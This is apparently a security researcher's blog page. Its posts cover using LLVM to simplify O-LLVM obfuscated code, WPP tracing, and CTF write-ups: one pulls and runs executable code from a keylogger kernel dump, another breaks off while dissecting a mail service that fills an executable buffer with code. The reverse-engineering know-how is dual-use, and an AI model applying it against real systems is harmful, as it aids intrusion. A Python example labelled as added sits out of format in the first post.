Details are still coming in<br>
Security research. <br>
IDA, WinDbg tips. <br>
Windows kernel development. <br>
CTF tasks and so on. <br>
UFOlogists CTF Team.<br>
<br>
Deobfuscation: Test O-LLVM protected code with simplification passes (2015-03-24)<br />
Roughly 5 years ago, during research at Taganrog Federal University, we opened a discussion: what is the easiest way to protect a program against heuristic analysis? The answer was easy: compile it with O0, O1, O2 and O3, and play with Ob and so on. <br />
<br />
The best way to do it is to take an existing compiler and modify it. The flexible and well-structured LLVM was already becoming the de facto standard for developing multi-platform compilers with new optimization features. So at that moment we wanted to use LLVM bitcode optimization modules for code replication. <br />
<br />
Our thoughts stayed thoughts, and I was pleasantly surprised when the guys from a Swiss university presented <a href="https://github.com/obfuscator-llvm/obfuscator/wiki">o-llvm</a>. They did a great job, and currently they support Instruction Substitution, Bogus Control Flow and Control Flow Flattening. The choice was not casual, and in this blog entry I'll discuss the complexity of the simplification problem and show how we can use the LLVM compiler to resolve some o-LLVM transformations.<br />
<br />
<span class="fullpost"><br />
Let's start with a review of articles related to functional equivalence.<br />
First of all I want to point out [<a href="http://profs.sci.univr.it/~giaco/download/Watermarking-Obfuscation/Malaga2.pdf">1</a>], where S. Chow and V. Zakharov provided the steps for control flow flattening transformations and, based on LBTM, proved that minimization and redundancy resolution are PSPACE-hard. So, for example, solving this problem can be mathematically equivalent to always completing a Nintendo game (<a href="http://arxiv.org/pdf/1203.1895.pdf">from here</a>). <br />
<br />
If we talk only about resolving opaque predicates, or, reformulated, determining the execution branch statically, then it is an NP-hard problem. In [<a href="http://www.cs.virginia.edu/~jck/publications/dsn_distribute.pdf">2</a>] Chenxi Wang and others showed this based on the 3-SAT problem and suggested two possible approximation methods: a brute-force search method (executing all blocks) and alias-detection approximation methods (opaque predicate matching). The <a href="http://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html">Quarkslab</a> team successfully simplified the transformation using the miasm framework, based on pattern matching for predicates and symbolic execution. The referenced attempt also complained that "there are always particular cases depending on the target binary", which, of course, makes a fully automatic simplification system impossible.<br />
<br />
Briefly, let's look through the complexity of other obfuscation techniques mentioned in the <a href="https://researchspace.auckland.ac.nz/bitstream/handle/2292/3491/TR148.pdf">obfuscation taxonomy</a>. The easiest, dead code elimination (DCE), as you might know, takes O(n^2); <a href="http://www.rw.cdl.uni-saarland.de/~grund/papers/cgo08-liveness.pdf">liveness analysis</a> O(n^3) (DCE + O(|n|)); SAT predicates can be solved with PPSZ in O(2^{0.386n}); <a href="http://research.cs.wisc.edu/wpis/papers/tr1461.pdf">code duplication elimination</a> is EXPTIME; a restructured array can be assessed like SSA + sort = n^2*log(n). <br />
I also want to mention Podlovchenko and his <a href="http://cyberleninka.ru/article/n/o-primenenii-metodov-deobfuskatsii-programm-dlya-obnaruzheniya-slozhnyh-kompyuternyh-virusov">articles</a> about using algebraic models for program equivalence. Depending on which model the transformation belongs to, the complexity varies from logarithmic to NP.<br />
<br />
I think the idea is clear now. For most transformation techniques simplification is possible. For the moment there are no universal methods of simplification, and only some experiments have been made. In this blog entry I want to show how LLVM could help us with simplification. <br />
Our steps are the following:<br />
- compile the code to LLVM-IR with o-LLVM obfuscation enabled (use the -emit-llvm flag)<br />
- optimize the obfuscated LLVM-IR with a released LLVM version<br />
- generate the graph for both IRs<br />
<br />
For the experiments we will use the code from the Quarkslab experiments. <br />
<br />
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">unsigned int target_function(unsigned int n)
{
    unsigned int mod = n % 4;
    unsigned int result = 0;
    /* every branch combines n with the same constant through a different pair of operators */
    if (mod == 0) result = (n | 0xBAAAD0BF) * (2 ^ n);
    else if (mod == 1) result = (n & 0xBAAAD0BF) * (3 + n);
    else if (mod == 2) result = (n ^ 0xBAAAD0BF) * (4 | n);
    else result = (n + 0xBAAAD0BF) * (5 & n);
    return result;
}
</pre></div><br />
Here is the LLVM-IR listing of the function compiled with O0.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnQujk1YkKlGYUfVX8Okj_g_FAU6ZYpLb4fLcsuCUq19ByAax4wTvCd9UYYByLFLpoC4tgCvRsQcHwYCaH8R5gImStV3gOoztdgpUc1wQMmDiHpYyNpLWp4G_GHVu3piz56vcehLk3FSI/s1600/target.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnQujk1YkKlGYUfVX8Okj_g_FAU6ZYpLb4fLcsuCUq19ByAax4wTvCd9UYYByLFLpoC4tgCvRsQcHwYCaH8R5gImStV3gOoztdgpUc1wQMmDiHpYyNpLWp4G_GHVu3piz56vcehLk3FSI/s640/target.png" /></a></div><br />
<br />
1. Let's start with Instruction Substitution, as the most basic technique.<br />
<br />
<table border="1"><tr> <td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSpIJOfSWIRswGx_g5sffIhKRoSyeKFR-gavQn6hVc0800IKU-fYVB-OwwPcMsM50hrgX5hr-9QMegOWq4j0ElXNSmq7B4wnUanzw0geynr_5bLmoE0rXEhQf175QmkbQcIHi2_GAa6g0/s1600/target_sub.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSpIJOfSWIRswGx_g5sffIhKRoSyeKFR-gavQn6hVc0800IKU-fYVB-OwwPcMsM50hrgX5hr-9QMegOWq4j0ElXNSmq7B4wnUanzw0geynr_5bLmoE0rXEhQf175QmkbQcIHi2_GAa6g0/s640/target_sub.png" /></a></div></td> <td><br />
<div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNg0IgsfnsABcwKLJ-yNlAxkKAl_6GwfvLt0xC9iU10uSLPVF_-tqR4QqJZET2epW1ebNiRPUYxmS3khTB8PaXWinE7EkwNhnb1QPOpApIRDG9eT-ODS7q0nNuaDjW5FFXKDkcwoB0_Q/s1600/opt_target_sub.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNg0IgsfnsABcwKLJ-yNlAxkKAl_6GwfvLt0xC9iU10uSLPVF_-tqR4QqJZET2epW1ebNiRPUYxmS3khTB8PaXWinE7EkwNhnb1QPOpApIRDG9eT-ODS7q0nNuaDjW5FFXKDkcwoB0_Q/s320/opt_target_sub.png" /></a></div></td> </tr>
</table><br />
As you can see, LLVM correctly resolved the substitution techniques for 3 branches. I assume that ideally the last branch should also be optimized. I'll show how to step through the LLVM optimization to see the exact behavior in later posts.<br />
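As an added example for this section (my own code, not the post's, O-LLVM's or LLVM's), the following models the substitution shapes that O-LLVM's Instruction Substitution pass applies to add/sub/and/or/xor on the four branch expressions of target_function, the peephole rules that undo them, and the brute-force equivalence check from [2]; the tuple tree encoding and the random-constant stand-in are assumptions of mine.

```python
"""Toy model of O-LLVM's Instruction Substitution pass and of a peephole pass that
undoes it, on 32-bit expression trees (added example: the rewrite shapes follow the
pass; the tree encoding, evaluator and simplifier are my own, not O-LLVM/LLVM code)."""
import random

MASK = 0xFFFFFFFF
# Nodes: ("const", v), ("var", name), ("neg", e), ("not", e),
#        ("add"|"sub"|"mul"|"and"|"or"|"xor", lhs, rhs)

def ev(e, env):
    """Evaluate with 32-bit wraparound, like the unsigned int in target_function."""
    op = e[0]
    if op == "const": return e[1] & MASK
    if op == "var": return env[e[1]] & MASK
    if op == "neg": return -ev(e[1], env) & MASK
    if op == "not": return ~ev(e[1], env) & MASK
    a, b = ev(e[1], env), ev(e[2], env)
    return {"add": a + b, "sub": a - b, "mul": a * b,
            "and": a & b, "or": a | b, "xor": a ^ b}[op] & MASK

def obfuscate(e, rng):
    """Replace every add/sub/and/or/xor with one substitution shape, bottom up."""
    op = e[0]
    if op in ("const", "var"): return e
    if op in ("neg", "not"): return (op, obfuscate(e[1], rng))
    a, b = obfuscate(e[1], rng), obfuscate(e[2], rng)
    if op == "mul": return ("mul", a, b)            # the pass leaves mul alone
    r = ("const", rng.getrandbits(32))              # stand-in for the pass's random constant
    rules = {
        "add": [("sub", a, ("neg", b)),                       # a - (-b)
                ("neg", ("add", ("neg", a), ("neg", b))),     # -(-a + -b)
                ("sub", ("add", ("add", a, r), b), r)],       # ((a + r) + b) - r
        "sub": [("add", a, ("neg", b)),                       # a + (-b)
                ("sub", ("sub", ("add", a, r), b), r)],       # ((a + r) - b) - r
        "and": [("and", ("xor", a, ("not", b)), a)],          # (a ^ ~b) & a
        "or":  [("or", ("and", a, b), ("xor", a, b))],        # (a & b) | (a ^ b)
        "xor": [("or", ("and", ("not", a), b), ("and", a, ("not", b)))],  # (~a&b)|(a&~b)
    }
    return rng.choice(rules[op])

def _peephole(e):
    """Undo one substitution shape at the root of e; return e unchanged if none matches."""
    op, x = e[0], e[1:]
    if op == "neg" and x[0][0] == "neg":                       # -(-a) -> a
        return x[0][1]
    if op == "add" and x[0][0] == "neg" and x[1][0] == "neg":  # -a + -b -> -(a + b)
        return ("neg", ("add", x[0][1], x[1][1]))
    if op == "add" and x[1][0] == "neg":                       # a + (-b) -> a - b
        return ("sub", x[0], x[1][1])
    if op == "sub" and x[1][0] == "neg":                       # a - (-b) -> a + b
        return ("add", x[0], x[1][1])
    if (op == "sub" and x[0][0] in ("add", "sub") and x[0][1][0] == "add"
            and x[0][1][2] == x[1]):                           # ((a + r) op b) - r -> a op b
        return (x[0][0], x[0][1][1], x[0][2])
    if op == "and" and x[0][0] == "xor" and x[0][2][0] == "not" and x[0][1] == x[1]:
        return ("and", x[1], x[0][2][1])                       # (a ^ ~b) & a -> a & b
    if op == "or" and x[0][0] == "and" and x[1][0] == "xor" and x[0][1:] == x[1][1:]:
        return ("or",) + x[0][1:]                              # (a & b) | (a ^ b) -> a | b
    if (op == "or" and x[0][0] == x[1][0] == "and" and x[0][1][0] == "not"
            and x[1][2][0] == "not" and x[0][1][1] == x[1][1] and x[0][2] == x[1][2][1]):
        return ("xor", x[1][1], x[0][2])                       # (~a & b) | (a & ~b) -> a ^ b
    return e

def simplify(e):
    """Bottom-up fixpoint: recover the children first, then the root's shape."""
    if e[0] in ("const", "var"): return e
    e = (e[0],) + tuple(simplify(c) for c in e[1:])
    while True:
        n = _peephole(e)
        if n == e: return e
        e = n

def variables(e):
    if e[0] == "var": return {e[1]}
    if e[0] == "const": return set()
    return set().union(*(variables(c) for c in e[1:]))

def equivalent(e1, e2, trials=2000, seed=1):
    """Brute-force functional check on random 32-bit inputs (evidence, not a proof)."""
    rng = random.Random(seed)
    for _ in range(trials):
        env = {v: rng.getrandbits(32) for v in variables(e1) | variables(e2)}
        if ev(e1, env) != ev(e2, env): return False
    return True

N, K = ("var", "n"), ("const", 0xBAAAD0BF)
TARGET_BRANCHES = {   # the four result expressions of target_function, keyed by n % 4
    0: ("mul", ("or", N, K), ("xor", ("const", 2), N)),
    1: ("mul", ("and", N, K), ("add", ("const", 3), N)),
    2: ("mul", ("xor", N, K), ("or", ("const", 4), N)),
    3: ("mul", ("add", N, K), ("and", ("const", 5), N)),
}

def roundtrip(expr, seed=7):
    """Obfuscate expr; return (still equivalent, original tree recovered, tree changed)."""
    obf = obfuscate(expr, random.Random(seed))
    return equivalent(expr, obf), simplify(obf) == expr, obf != expr

def demo():
    """Run the round trip on every branch of target_function."""
    return {mod: roundtrip(expr) for mod, expr in TARGET_BRANCHES.items()}
```

The peephole rules are the inverse of the shapes the pass emits, so they recover the original tree exactly; on a nested expression a real instcombine may instead land on a different but equivalent form, which is why the random-input equivalence check is kept separate from the structural one.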
<br />
2. The next transformation to analyze is Bogus Control Flow (BCF).<br />
<br />
<table border="1"><tr> <td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9YIMyT3mSE0gjQynXnwlMJOLZ6LE32e4CBQ8ZpW_QAZ8F1zlXzDErECA4IZg7ZySy4MrUD6RC35mrSL3l3QkG9qAbwknfTj5ywDFJHdYo2hD1eyLUG-VJIElGBvp07H2Yt6XC18ZFBK4/s1600/target_bcf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9YIMyT3mSE0gjQynXnwlMJOLZ6LE32e4CBQ8ZpW_QAZ8F1zlXzDErECA4IZg7ZySy4MrUD6RC35mrSL3l3QkG9qAbwknfTj5ywDFJHdYo2hD1eyLUG-VJIElGBvp07H2Yt6XC18ZFBK4/s640/target_bcf.png" /></a></div></td> <td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiijWeUxBZADGQLx0srvgl8iiyrloPGfJ3r18xyTlsABI1TyGr5NS79lTHtc-EnKJXZ2Bx8SfdmEenSOe-IA2KV4-8obqNd5DrZxG1iVu86VLQ8X8Q0hgiU8Vk5Yir7ys2GoKcvpgOkgoQ/s1600/opt_target_bcf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiijWeUxBZADGQLx0srvgl8iiyrloPGfJ3r18xyTlsABI1TyGr5NS79lTHtc-EnKJXZ2Bx8SfdmEenSOe-IA2KV4-8obqNd5DrZxG1iVu86VLQ8X8Q0hgiU8Vk5Yir7ys2GoKcvpgOkgoQ/s640/opt_target_bcf.png" /></a></div></td> </tr>
</table><br />
LLVM removed 3 blocks and optimized a few of them. The third and the last (TF) blocks from the bottom look weird, with FALSE edges connecting to them. I think with one more backward iteration LLVM could simplify those redundant FALSE branches.<br />
<br />
3. The last transformation I want to test is Control Flow Flattening.<br />
<br />
<table border="1"><tr><td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdajpDOZX73fl0Yx9epqtrjTNDzVk2Fd8dLwFQpMbOFmvcSlyFsarNr30RU3jDH8XACXaJ920EYbeQOgMwFJ4u8bNzG-D8iQl7KI_9H7WM6wKmJyJvs_Upq6vUmfjgOx_d2I5jb3lPgY0/s1600/target_flat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdajpDOZX73fl0Yx9epqtrjTNDzVk2Fd8dLwFQpMbOFmvcSlyFsarNr30RU3jDH8XACXaJ920EYbeQOgMwFJ4u8bNzG-D8iQl7KI_9H7WM6wKmJyJvs_Upq6vUmfjgOx_d2I5jb3lPgY0/s640/target_flat.png" /></a></div></td></tr>
<tr><td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMNUZheChtP_1uEpEL-R-qrUDRriTILXYN6-WgbWTSufK1tI-lzh0lt-DErJg4c_GvyXpLWWT7jbbHHK9L2rwLMLLkV3Mlvs24CaCHOgwaqSiyE6difPKIXfIJM6-ukYFdFro77B9oJU/s1600/opt_target_flat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMNUZheChtP_1uEpEL-R-qrUDRriTILXYN6-WgbWTSufK1tI-lzh0lt-DErJg4c_GvyXpLWWT7jbbHHK9L2rwLMLLkV3Mlvs24CaCHOgwaqSiyE6difPKIXfIJM6-ukYFdFro77B9oJU/s640/opt_target_flat.png" /></a></div></td></tr>
</table><br />
The state machine created by the flattening transformation was kept by LLVM. The only optimization made was combining code from different states. The optimized entries 21 - 28 are the same, and I'm wondering why LLVM still kept them. If those blocks were removed, the code would be pretty much the same as the optimized Instruction Substitution.<br />
<br />
<br />
LLVM has a good architecture and allows a developer, researcher or malware writer to modify code in any direction they want. For people who want to get deep into o-LLVM I highly recommend reading <a href="http://it-ebooks.info/book/4588/">Getting Started with LLVM</a> first.<br />
The experiments showed us that LLVM can already simplify some easy transformations and, with modification, will surely be able to resolve complex stuff. But it is already a cat and mouse game. The good news after my tests is that it is already possible to create a replication engine with LLVM, O-LLVM and <a href="https://github.com/trailofbits/mcsema">mc-sema</a> as a binary-to-LLVM translation engine.<br />
<br />
In the next blog posts I want to do some more experiments with [Obfuscation-]LLVM and mc-sema.<br />
</span>
<br />
Using WPP to trace usermode apps (2015-01-05)<br />
I've created a sample app <a href="https://github.com/antoxar/WPPTracingSample">here</a> so that I don't forget how to include WPP in a system service. For more details, the Russian blog post is on <a href="http://habrahabr.ru/post/247173/">habrahabr</a>.<br />
<br />
UFOCTF WriteUP: Mmmm, Whiskey metal (2013-07-22)<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Task: </b><br />
My brother has taught me Windows kernel programming, but I always asked him to help me with debugging. He got pissed off after a while. So he created a kernel dump analysis task for me. I can't find the answer. Please help me find the key and I will give you N points. I know that he modified my keylogger somehow, and I'm sure that the driver is already unloaded in the virtual PC.<br />
<br />
P.S. I already got a few tips:<br />
- the key is SHA256 or the decoded string<br />
- My brother always makes a "Burp" and likes tea.<br />
<br />
Here you can find a dump.<br />
https://docs.google.com/file/d/0Bw72cstp5cGsMVlDSlBJU05fdVE<br />
<br />
Here is a short how-to...<br />
<span class="fullpost">
<br />
First you should find the "Burp" log string in the memory dump. There are two ways here. Using DebugView:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrVH6DiGjkoeWDF-h5F0qzOe7QTaUKIcbHrSR8-HzUY4EhtXAtN87BWveDEef8pT1Aos0oqtk2mrKmUcY5ziA-b55qESn9ah7T0jPW-CrVDcT-jcmbgg6rZDE4JEQjSbcq4zyJOOqUT60/s1600/UFOCTF2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrVH6DiGjkoeWDF-h5F0qzOe7QTaUKIcbHrSR8-HzUY4EhtXAtN87BWveDEef8pT1Aos0oqtk2mrKmUcY5ziA-b55qESn9ah7T0jPW-CrVDcT-jcmbgg6rZDE4JEQjSbcq4zyJOOqUT60/s640/UFOCTF2.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
Or just use the search in WinDbg.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJn-Y9IbBAC1xGtP-IkjeQaFy_6IN1SyJdrA_5QuERisEP1foozHeX4bPZ55_7U5wJJxW6kmttFFjVSQ34ReHAnqsEXy1jzi5FsTt6anis8If0sNth0x0r_nczA43bnphn-pQVQBQWB8g/s1600/UFOCTF1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJn-Y9IbBAC1xGtP-IkjeQaFy_6IN1SyJdrA_5QuERisEP1foozHeX4bPZ55_7U5wJJxW6kmttFFjVSQ34ReHAnqsEXy1jzi5FsTt6anis8If0sNth0x0r_nczA43bnphn-pQVQBQWB8g/s640/UFOCTF1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: center;">Next, start to analyze the pool shown in the log.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY0EY03qmPT3R2kBehltSRY-Ib-Lv1vAORtQomlx8dVR1U6ZFEK9tFxtTnSwx3siDOH0Z4pxJaMN87lKfmKYjH86m21AKbrPrR6btL0XM4rWcXXPJdxkNoTxA69oegAWXKWRKV-F-sNO8/s1600/UFOCTF3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY0EY03qmPT3R2kBehltSRY-Ib-Lv1vAORtQomlx8dVR1U6ZFEK9tFxtTnSwx3siDOH0Z4pxJaMN87lKfmKYjH86m21AKbrPrR6btL0XM4rWcXXPJdxkNoTxA69oegAWXKWRKV-F-sNO8/s640/UFOCTF3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Take a look inside.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSoi15yILWBud4RHZ7pJSKYumnoFhS-I0SlzkuqBwfryKypF3gSfE-ndT2MgAZvSq_pdFW-dsf9mnMJg7ylXtkAFwxEdXCeYCzv9IlmyPnfVy-ckNBI9ioYgxtLDP-g7frghhNeJkIjI/s1600/UFOCTF4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSoi15yILWBud4RHZ7pJSKYumnoFhS-I0SlzkuqBwfryKypF3gSfE-ndT2MgAZvSq_pdFW-dsf9mnMJg7ylXtkAFwxEdXCeYCzv9IlmyPnfVy-ckNBI9ioYgxtLDP-g7frghhNeJkIjI/s640/UFOCTF4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Executable code found. Let's execute it. First we save the memory.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-KV6C-A7c-aDuGvkPJF6gdqNBTJGagVanGEmreJfasFX-ra7VQaGMagMKEgn9735HXCsfrID_yTrXgtOcONl4PTd5tHz-0_l3vIAZ-WDCNNeiqZnzKeYgOEJXg83sJQf3O9y1C3pRII/s1600/UFOCTF8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-KV6C-A7c-aDuGvkPJF6gdqNBTJGagVanGEmreJfasFX-ra7VQaGMagMKEgn9735HXCsfrID_yTrXgtOcONl4PTd5tHz-0_l3vIAZ-WDCNNeiqZnzKeYgOEJXg83sJQf3O9y1C3pRII/s640/UFOCTF8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">To execute it I will use WinDbg. Load notepad in WinDbg, use .readmem to load the saved memory, and set eip.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1OhPKTmai29JBx2SVvU7qdNg4i3R21HG-6IDa-VpHyMNmB7OwA3p-m2n-jCbUNGDj6CCJaYgdp6hdiFmg9QhEyWsPwqIziV3uU7wC-A2iP4nzPONX6wvn9TaFxHIM0b6H8j5bZY25-h8/s1600/UFOCTF9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1OhPKTmai29JBx2SVvU7qdNg4i3R21HG-6IDa-VpHyMNmB7OwA3p-m2n-jCbUNGDj6CCJaYgdp6hdiFmg9QhEyWsPwqIziV3uU7wC-A2iP4nzPONX6wvn9TaFxHIM0b6H8j5bZY25-h8/s640/UFOCTF9.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Here is the key:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSF91aifd9QAP2NBbOyFEAfz_nLv6AdL1r5EUBOT7yFAcmbRY_I3-TVrzTGQRUNatBv6ZDsLvmYJYKP9JstSA9ag7GUo-bwTVZXcXGczw6MNY_C1fiLrBuXRS5PVa9eR-9OzgwsqL4y2o/s1600/UFOCTF10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSF91aifd9QAP2NBbOyFEAfz_nLv6AdL1r5EUBOT7yFAcmbRY_I3-TVrzTGQRUNatBv6ZDsLvmYJYKP9JstSA9ag7GUo-bwTVZXcXGczw6MNY_C1fiLrBuXRS5PVa9eR-9OzgwsqL4y2o/s640/UFOCTF10.png" width="640" /></a></div>
</span></div>
<br />
Detecting abnormal executable files using binary code mining (2013-02-07)<br />
<div style="margin-bottom:5px"> <strong> <a href="http://www.slideshare.net/AntonRechkov/beamer-daad-final" title="Rechkov. Lomonosov Report" target="_blank">Rechkov. Lomonosov Report</a> </strong> from <strong><a href="http://www.slideshare.net/AntonRechkov" target="_blank">Anton Rechkov</a></strong> </div>
P.S. Please don't be shy to add comments and ideas!<br />
<br />
Write up Mailgw ICTF2011 (2011-12-03)<div dir="ltr" style="text-align: left;" trbidi="on">It was the best CTF I have ever played. Many thanks to the organisers. I'm at TU Berlin right now and I played with the ENOFLAG team. <br />
In this post I will describe the mailgw service. <br />
<span class="fullpost"><br />
Let's analyse it with IDA. Analysis of a server application should start from the accept function.<br />
<div class="cpp" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><pre>while ( 1 )
{
  v23 = 16;
  v24 = accept(v25, (struct sockaddr *)&v28, (socklen_t *)&v23);
  if ( v24 &lt; 0 )
  {
    v13 = __errno_location();
    v14 = strerror(*v13);
    fprintf(stderr, "ERROR: accept on socket failed: %s\n", v14);
    result = 1;
    goto LABEL_34;
  }
  v19 = fork();                 /* one child process per accepted connection */
  if ( v19 &lt; 0 )
  {
    v15 = __errno_location();
    v16 = strerror(*v15);
    fprintf(stderr, "ERROR: fork failed: %s\n", v16);
    result = 1;
    goto LABEL_34;
  }
  if ( !v19 )
    break;                      /* child: leave the accept loop */
  close(v24);                   /* parent: drop its copy of the client socket */
}
dup2(v24, 0);                   /* child: stdin and stdout are now the socket */
dup2(v24, 1);
result = manage_tcp_client();
}
</pre></div><span class="fullpost"><span class="fullpost"><br />
As you can see, the child logic is provided in the <b>manage_tcp_client</b> function.<br />
There is a switch with the following values:<br />
n - create account;<br />
q - quit;<br />
m - message;<br />
r - read;<br />
+ - create recipient;<br />
- - create recipient;<br />
l - list recipients;<br />
s - send message.<br />
<br />
The '+' block attracts the most attention.<br />
There is a memory allocation and<br />
</span><br />
</span><br />
<div class="cpp" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><pre>mprotect((void *)(-v12 &amp; (unsigned int)s2), ((unsigned int)&amp;s2[v12 + 283] &amp; -v12) - (_DWORD)addr, 7);
</pre></div><span class="fullpost"><span class="fullpost"><br />
7 means EXEC+WRITE+READ. The first thing I did was patch this value to 3.<br />
The next interesting place is where the protected buffer is filled with code.<br />
<br />
</span></span><br />
<div class="c" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span class="fullpost"><span class="fullpost"><span style="font-size: small;">v15 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">260</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">s2</span><span style="color: #009900; font-size: small;">[</span><span style="color: #0000dd; font-size: small;">260</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">-</span><span style="color: #0000dd; font-size: small;">52</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">++</span><span style="font-size: small;">i</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">v15</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> 0x82474FFu</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">+=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">4</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">v15</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> 0x82454FFu</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
